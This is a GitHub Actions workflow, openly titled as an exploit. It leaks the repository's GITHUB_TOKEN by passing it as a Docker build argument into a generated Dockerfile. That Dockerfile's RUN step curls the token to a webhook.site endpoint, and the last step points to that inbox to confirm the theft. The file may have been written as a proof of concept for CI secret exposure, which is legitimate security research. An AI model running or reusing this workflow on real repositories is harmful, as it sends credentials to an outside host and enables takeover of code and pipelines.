name: Leak GITHUB_TOKEN via Docker ARG Injection with Debug

on:
  workflow_dispatch:

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Create malicious Dockerfile
        run: |
          echo "FROM alpine:latest" > Dockerfile
          echo "ARG TOKEN" >> Dockerfile
          echo "RUN apk add --no-cache curl && curl -X POST -d \"token=\$TOKEN\" https://webhook.site/529200f3-872d-4083-bf2d-b5c014761b69" >> Dockerfile

      - name: Show Dockerfile contents
        run: cat Dockerfile

      - name: Build Docker image with secret
        run: docker build --build-arg TOKEN="${{ secrets.GITHUB_TOKEN }}" -t leak-image .

      - name: Run image to confirm leak POST
        run: docker run --rm leak-image

      - name: Run image to check leaked file (if any)
        run: docker run --rm leak-image sh -c "cat /leak || echo No leak file found"

      - name: Final confirmation
        run: echo "Check webhook.site inbox for POST with token=..."
